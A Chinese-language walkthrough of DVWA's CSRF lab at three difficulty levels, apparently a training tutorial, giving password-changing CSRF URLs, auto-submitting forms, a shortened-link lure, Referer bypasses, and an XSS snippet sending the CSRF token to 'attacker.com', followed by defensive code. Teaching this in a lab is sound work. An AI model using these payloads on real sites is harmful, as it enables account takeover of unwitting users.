DVWA靶场CSRF通关保姆级教程:从Low到High,手把手教你三种难度实战(附BurpSuite插件用法)
DVWA靶场CSRF漏洞实战:从基础利用到自动化攻击
第一次接触CSRF漏洞时,我完全被这种"借刀杀人"的攻击方式震惊了。想象一下,你正在浏览一个看似无害的网页,而它却在后台悄悄修改了你在另一个网站上的密码——这就是CSRF攻击的可怕之处。DVWA(Damn Vulnerable Web Application)作为最受欢迎的漏洞练习平台之一,为我们提供了从低到高三种不同安全级别的CSRF实战环境。本文将带你深入探索每个级别的攻防细节,特别聚焦于如何将BurpSuite等专业工具融入攻击流程,实现从手工测试到自动化攻击的进阶。
1. 环境准备与基础概念
在开始实战之前,我们需要搭建好实验环境并理解CSRF的核心原理。DVWA可以通过Docker快速部署:
docker pull vulnerables/web-dvwa docker run -d -p 80:80 vulnerables/web-dvwa访问http://localhost后,使用默认凭证admin/password登录。在DVWA Security设置中将安全级别调整为"Low"。
CSRF攻击三要素:
- 用户身份验证:受害者已在目标网站登录
- 会话保持:浏览器保持登录状态(通过Cookie)
- 诱导触发:攻击者诱导用户访问恶意请求
表:CSRF与XSS关键区别
| 特性 | CSRF | XSS |
|---|---|---|
| 攻击目标 | 利用用户权限执行操作 | 窃取用户数据或会话 |
| 执行位置 | 目标网站 | 用户浏览器 |
| 防御重点 | 请求来源验证 | 输入输出过滤 |
提示:在测试CSRF漏洞前,务必确保已在DVWA中登录并保持会话有效。建议使用Firefox或Chrome的无痕模式进行测试,避免浏览器缓存干扰。
2. Low级别:基础CSRF利用实战
Low级别移除了所有CSRF防护措施,是最理想的入门练习环境。我们首先通过最简单的URL参数修改来理解攻击原理。
2.1 手工漏洞利用
- 在DVWA中导航到"CSRF"模块
- 尝试将密码修改为"123456"
- 观察浏览器地址栏出现的URL结构:
http://localhost/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#这个URL包含了所有修改密码所需的参数。我们可以直接复制这个URL,在新标签页打开,密码就会被修改——这就是最基本的CSRF攻击。
2.2 使用短链接伪装
真实攻击中,攻击者会隐藏恶意URL。我们可以使用短链接服务:
- 访问可靠的短链接生成网站(如bit.ly)
- 将恶意URL转换为短链接
- 通过邮件或社交媒体诱使用户点击
<!-- 恶意网页示例 --> <a href="https://bit.ly/3xYzAbc">点击领取免费礼品</a>2.3 BurpSuite PoC生成
BurpSuite专业版提供了更专业的攻击构造工具:
- 拦截修改密码的请求
- 右键选择"Engagement tools" → "Generate CSRF PoC"
- 调整HTML代码,添加诱骗点击的元素
- 复制代码保存为HTML文件
<!-- BurpSuite生成的PoC示例 --> <html> <body> <form action="http://localhost/vulnerabilities/csrf/" method="GET"> <input type="hidden" name="password_new" value="hacked"> <input type="hidden" name="password_conf" value="hacked"> <input type="hidden" name="Change" value="Change"> <input type="submit" value="点击查看惊喜"> </form> <script>document.forms[0].submit();</script> </body> </html>3. Medium级别:绕过Referer检查
Medium级别引入了基础的防护措施——检查HTTP Referer头。我们需要理解并绕过这一防护。
3.1 分析防护机制
尝试直接复制Low级别的攻击URL在Medium级别使用,会发现操作失败。通过BurpSuite拦截请求,可以观察到:
- 合法请求包含完整的Referer头:
Referer: http://localhost/vulnerabilities/csrf/ - 直接URL访问的请求Referer头缺失或被过滤
查看DVWA源码(medium.php)可以发现关键验证逻辑:
if(stripos($_SERVER['HTTP_REFERER'], $_SERVER['SERVER_NAME']) === false) { die("请求来源不合法"); }3.2 两种绕过方法
方法一:伪造Referer头
- 创建包含恶意表单的HTML文件
- 使用meta标签控制Referer:
<html> <head> <meta name="referrer" content="unsafe-url"> </head> <body> <form action="http://localhost/vulnerabilities/csrf/" method="GET"> <!-- 表单字段 --> </form> <script>document.forms[0].submit();</script> </body> </html>方法二:利用同源策略漏洞
如果目标站点存在子域名控制不严的问题,可以在子域名下托管攻击页面:
- 假设
blog.localhost是目标站点的子域名 - 在
blog.localhost上托管恶意HTML - 生成的Referer将包含
localhost,通过验证
4. High级别:自动化Token劫持
High级别引入了CSRF Token这一强防护机制,我们需要更高级的技术来绕过。
4.1 理解Token机制
观察High级别的请求,会发现多了一个user_token参数:
http://localhost/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change&user_token=8a7d6f5g4h3j2k1#这个Token每次请求都会变化,并与用户会话绑定,使得传统的CSRF攻击失效。
4.2 使用BurpSuite插件自动化
CSRF Token Tracker插件可以自动获取和更新Token:
- 在BurpSuite的BApp Store安装"CSRF Token Tracker"
- 拦截一个修改密码的请求发送到Repeater
- 在插件界面配置:
- Host: localhost
- Token parameter name: user_token
- 勾选"Update token in real time"
- 每次重放请求时,插件会自动获取新Token并更新
表:CSRF防护级别与绕过技术对比
| 防护级别 | 防护措施 | 绕过技术 | 工具需求 |
|---|---|---|---|
| Low | 无 | 直接URL构造 | 无 |
| Medium | Referer检查 | Referer伪造/子域名利用 | 基本HTTP工具 |
| High | CSRF Token | Token劫持/XSS组合攻击 | BurpSuite插件 |
4.3 组合XSS漏洞攻击
如果目标站点同时存在XSS漏洞,可以组合利用:
- 通过XSS获取当前页面的CSRF Token
- 构造包含动态Token的恶意请求
- 自动提交请求
// 通过XSS获取Token的示例代码 var token = document.getElementsByName('user_token')[0].value; var img = new Image(); img.src = 'http://attacker.com/steal?token=' + token;5. 防御措施与最佳实践
理解了攻击手段后,我们更应关注如何有效防御CSRF攻击。以下是几种经过验证的防护方案:
5.1 同步Token模式
# Flask示例:生成和验证CSRF Token from flask import Flask, session, request import os app = Flask(__name__) app.secret_key = os.urandom(24) @app.before_request def csrf_protect(): if request.method == "POST": token = session.pop('_csrf_token', None) if not token or token != request.form.get('_csrf_token'): abort(403) def generate_csrf_token(): if '_csrf_token' not in session: session['_csrf_token'] = os.urandom(24).hex() return session['_csrf_token']5.2 SameSite Cookie属性
现代浏览器支持通过Cookie属性防御CSRF:
Set-Cookie: sessionid=xxxx; SameSite=Strict; Secure; HttpOnly- Strict:完全禁止跨站发送Cookie
- Lax:允许安全方法(如GET)的跨站请求
5.3 双重提交Cookie
- 服务器设置随机Token到Cookie
- 前端JavaScript读取Cookie并作为表单字段提交
- 服务器验证Cookie和表单中的Token是否匹配
// 前端自动添加Token document.addEventListener('DOMContentLoaded', function() { let token = document.cookie.match('(^|;) ?csrf_token=([^;]*)(;|$)'); if(token) { let input = document.createElement('input'); input.type = 'hidden'; input.name = 'csrf_token'; input.value = token[2]; document.forms[0].appendChild(input); } });在DVWA靶场的CSRF实战中,最令我印象深刻的是High级别的Token绕过过程。第一次成功使用CSRF Token Tracker插件自动完成攻击时,我真正理解了自动化工具在渗透测试中的价值。不过要记住,这些技术只应用于合法授权的安全测试,任何未经授权的攻击尝试都是违法的。